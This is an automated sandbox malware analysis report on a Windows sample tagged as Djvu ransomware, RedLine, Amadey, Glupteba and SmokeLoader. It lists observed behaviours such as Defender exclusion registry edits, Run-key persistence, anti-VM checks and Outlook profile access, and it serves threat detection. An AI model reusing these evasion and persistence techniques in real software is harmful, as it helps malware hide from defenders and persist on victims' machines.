Malware Analysis Report

2025-01-18 05:07

Sample ID 231017-vbnvaafe62
Target NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe
SHA256 2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900
Tags
amadey djvu glupteba redline smokeloader logsdiller cloud (tg: @logsdillabot) backdoor collection discovery dropper evasion infostealer loader persistence ransomware themida trojan pub1 upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900

Threat Level: Known bad

The file NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe was found to be: Known bad.

Malicious Activity Summary

amadey djvu glupteba redline smokeloader logsdiller cloud (tg: @logsdillabot) backdoor collection discovery dropper evasion infostealer loader persistence ransomware themida trojan pub1 upx

RedLine

Amadey

Djvu Ransomware

Windows security bypass

SmokeLoader

Glupteba

Detected Djvu ransomware

Glupteba payload

RedLine payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Themida packer

UPX packed file

Modifies file permissions

Checks BIOS information in registry

Executes dropped EXE

Deletes itself

Loads dropped DLL

Windows security modification

Checks whether UAC is enabled

Looks up external IP address via web service

Adds Run key to start application

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

outlook_office_path

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-17 16:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-17 16:49

Reported

2023-10-17 16:55

Platform

win7-20230831-en

Max time kernel

118s

Max time network

171s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4272.exe = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\159.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\159.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\159.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4272.exe = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\727fb0f1-09ae-4421-a570-c84a25e4aa61\\FD04.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\FD04.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\159.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\159.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\4272.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\4272.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\4272.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\159.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4272.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\4272.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1220 wrote to memory of 1724 N/A N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1220 wrote to memory of 1724 N/A N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1220 wrote to memory of 1724 N/A N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe
PID 1220 wrote to memory of 1724 N/A N/A C:\Users\Admin\AppData\Local\Temp\FD04.exe
